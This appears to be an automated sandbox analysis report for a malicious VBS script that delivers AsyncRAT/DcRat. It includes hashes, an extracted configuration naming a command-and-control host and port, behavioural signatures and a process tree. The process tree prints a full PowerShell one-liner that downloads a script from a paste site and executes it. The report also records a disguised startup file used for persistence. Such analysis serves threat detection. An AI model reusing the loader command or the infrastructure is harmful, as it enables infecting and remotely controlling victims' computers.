Analysis
-
max time kernel
127s -
max time network
135s -
platform
windows10-2004_x64 -
resource
win10v2004-en-20220113 -
submitted
15-04-2022 12:16
Static task
static1
Behavioral task
behavioral1
Sample
WorkScope Details.vbs
Resource
win7-20220414-en
General
-
Target
WorkScope Details.vbs
-
Size
31KB
-
MD5
0284695a0af70e045cf579e015ebbdf4
-
SHA1
f0c20148cf96f0c81463e0224d80d4c67d7c1a04
-
SHA256
78a742710aa79e0574a6faefecfaf851b64043889e75768f5de091cfc5a21dc0
-
SHA512
6e54499711e1a0ee1ecd4679d7584027a424ba496d0bca868cc8e8d13d47097c4f0d65c0e4277c1457371b37e0c525a8ade33860cabd4e8869a438282af89e56
Malware Config
Extracted
https://textbin.net/raw/mevlbkxshp
Extracted
asyncrat
1.0.7
Default
rick63.publicvm.com:5900
DcRatMutex_qwqdanchun
-
delay
1
-
install
false
-
install_folder
%AppData%
Signatures
-
Meta Stealer Stealer
Meta Stealer steals passwords stored in browsers, written in C++.
-
suricata: ET MALWARE Observed Malicious SSL Cert (AsyncRAT)
suricata: ET MALWARE Observed Malicious SSL Cert (AsyncRAT)
-
Async RAT payload 2 IoCs
resource yara_rule behavioral2/memory/4548-152-0x000000000040CBCE-mapping.dmp asyncrat behavioral2/memory/4548-151-0x0000000000400000-0x0000000000412000-memory.dmp asyncrat -
Blocklisted process makes network request 1 IoCs
flow pid Process 5 3360 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation WScript.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MicroSoftOutlookLauncher.vbs powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1668 set thread context of 4548 1668 powershell.exe 88 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Delays execution with timeout.exe 1 IoCs
pid Process 544 timeout.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 3360 powershell.exe 3360 powershell.exe 1668 powershell.exe 1668 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 3360 powershell.exe Token: SeDebugPrivilege 1668 powershell.exe Token: SeDebugPrivilege 4548 RegSvcs.exe -
Suspicious use of WriteProcessMemory 22 IoCs
description pid Process procid_target PID 2748 wrote to memory of 3360 2748 WScript.exe 80 PID 2748 wrote to memory of 3360 2748 WScript.exe 80 PID 3360 wrote to memory of 1668 3360 powershell.exe 82 PID 3360 wrote to memory of 1668 3360 powershell.exe 82 PID 1668 wrote to memory of 804 1668 powershell.exe 85 PID 1668 wrote to memory of 804 1668 powershell.exe 85 PID 804 wrote to memory of 3276 804 csc.exe 86 PID 804 wrote to memory of 3276 804 csc.exe 86 PID 1668 wrote to memory of 4548 1668 powershell.exe 88 PID 1668 wrote to memory of 4548 1668 powershell.exe 88 PID 1668 wrote to memory of 4548 1668 powershell.exe 88 PID 1668 wrote to memory of 4548 1668 powershell.exe 88 PID 1668 wrote to memory of 4548 1668 powershell.exe 88 PID 1668 wrote to memory of 4548 1668 powershell.exe 88 PID 1668 wrote to memory of 4548 1668 powershell.exe 88 PID 1668 wrote to memory of 4548 1668 powershell.exe 88 PID 4548 wrote to memory of 220 4548 RegSvcs.exe 93 PID 4548 wrote to memory of 220 4548 RegSvcs.exe 93 PID 4548 wrote to memory of 220 4548 RegSvcs.exe 93 PID 220 wrote to memory of 544 220 cmd.exe 95 PID 220 wrote to memory of 544 220 cmd.exe 95 PID 220 wrote to memory of 544 220 cmd.exe 95
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\WorkScope Details.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2748 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -Command [System.Net.WebClient] $Client = New-Object System.Net.WebClient; [Byte[]] $DownloadedData = $Client.DownloadData('https://textbin.net/raw/mevlbkxshp'); [String] $ByteToString = [System.Text.UTF8Encoding]::UTF8.GetString($DownloadedData); [System.IO.File]::WriteAllText('C:\Users\Public\mevlbkxshp.PS1', $ByteToString, [System.Text.Encoding]::UTF8); Invoke-Expression 'PowerShell -ExecutionPolicy RemoteSigned -File C:\Users\Public\mevlbkxshp.PS1'2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3360 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -File C:\Users\Public\mevlbkxshp.PS13⤵
- Drops startup file
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1668 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\y0kudd0k\y0kudd0k.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:804 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8923.tmp" "c:\Users\Admin\AppData\Local\Temp\y0kudd0k\CSC4FC5FF9075EC4108B0398759F6937AB3.TMP"5⤵PID:3276
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"4⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4548 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpE210.tmp.bat""5⤵
- Suspicious use of WriteProcessMemory
PID:220 -
C:\Windows\SysWOW64\timeout.exetimeout 36⤵
- Delays execution with timeout.exe
PID:544
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD585df31411080f87203ed45b0dab4f336
SHA15bf5b44ce38fa21c305c1a375da9e6ad84f48892
SHA256e15527444c709b53eca9bc57890b4f6340fce53de1b5b0302a547f18da5974e5
SHA512963cf413d03add219bc832009f2ae5de426a4fae0633f02dfe90db4754f375e8bbe06d967bb6cbca59d1c41476126f1c78d2073adb5ba39ca420adafa3b0944c
-
Filesize
1KB
MD5a5c074e56305e761d7cbc42993300e1c
SHA139b2e23ba5c56b4f332b3607df056d8df23555bf
SHA256e75b17396d67c1520afbde5ecf8b0ccda65f7833c2e7e76e3fddbbb69235d953
SHA512c63d298fc3ab096d9baff606642b4a9c98a707150192191f4a6c5feb81a907495b384760d11cecbff904c486328072548ac76884f14c032c0c1ae0ca640cb5e8
-
Filesize
1KB
MD59322b95f07b7e1e271c2fa8874a5f20c
SHA1612c8d9ac50efe4e8d76ac5b5f47811703277975
SHA256fd2c5952ffa58b90417151f7bc0cd9f1c3e25201f07c36a093dcd3ebbae835ba
SHA5120833462403820790f163d88961930ec54a997cd470ae39f7cc6c6829579b83ebd7b86360a4db9a07e0997075375bd67d0a15890b0e0a59d3e9ed86db3ae30b6f
-
Filesize
171B
MD5cdd92e0efb357b3e483b7b5aaeda5639
SHA1d8eedc466f9a8e87d1b02ea01f93bd36c45fd27d
SHA256f490959c2d53c1a690890eb7c33a5749bfb71144f95e6fc5e151061be9a1f3f8
SHA51276b05516a5ebd9b14d63b4c69171f6022f795df690d9e64914ecbb4f82d369c0aae1ce085792af72948bb9bcee7f6eab8b8b61f593706fd341d0c69ccac5636e
-
Filesize
11KB
MD5e77a052b93a30c4998702632cfdbaec7
SHA1aa5191f5285e831b26a462027e0ae6b7cf38f098
SHA256314754b99df20170e81f913348a42b43c8a18ef717be0415e6734836f25041f8
SHA51241e9d116d5a1fa75ed4bcc064fc674cf519009821dbfc3cf1cda640861b3acfb2d3a4e022a0bf58efae2b7dd362065bed9d6764fbd8f89fd304af0304e0814db
-
Filesize
119KB
MD5295c2976c1c116f86593c92dc671862f
SHA1f99d1953227b7d6ba569af28463bef765966eec3
SHA2565034918a1e8e29df87b61c95a05f1a3bf623a7b5f3b040076bacc448b0ee796d
SHA5129e179e68c4836b0c8d91157b71d0ca97ac3b787e71b5e4d7c84327aeb95ea5ea0599eb96be0630922e6cfaa33a2142615d4f1aa5dd7c8c8d9f663538c95cb15f
-
Filesize
652B
MD53385d2e703ca3664a07c88f8b0fecdef
SHA14d4af9a126aeed0f7483f1c859ae8906397b20f2
SHA256b1e9cb3a2ea5d7936927ad1e09f3069a50ed269bbefa12c0870480e8f4fb0a25
SHA5128459da4b43bd67a44a7febf7999b5d15dcf1430fc8fb96426ad953375ae92ef08281f0f03723cbc137a1029416c6be1c9c2d4a743cf8cdd28864f2aa8d3a303d
-
Filesize
14KB
MD55b28648a4e188b0ebdf2d5edcda61624
SHA1faf0ba6c2ef8d8184881eda8a276796449969e1c
SHA256e92acafc5a9dd128b120809aaf76178275c3d22b13fb7cc2f0d9c624befed1b1
SHA512972fca6205f8927363b751ff51c6cf07c3b42f7cbd8fbe12c1098df539118ecf3d3ce1af3b5d376c8710ed183786fc911279ff81941aba4202a11ca5670b9937
-
Filesize
327B
MD51c015fc25c1822842e0f90115b0481a4
SHA17454885012a06b7adcc3fcbdd3575c7e44d0a52e
SHA2560586138145806ce5fb70898a1496bf8ce90dca81b118a28a6583c1b3db612ac6
SHA5120a93ebd7c7d7830f7969caf03ae9aed15be51a139bcb2624e7e1be5f634dc419fa3b0d2ed9be20a21456ea2cad7c0c192a8fb4d88e9ad36db756790eac70e059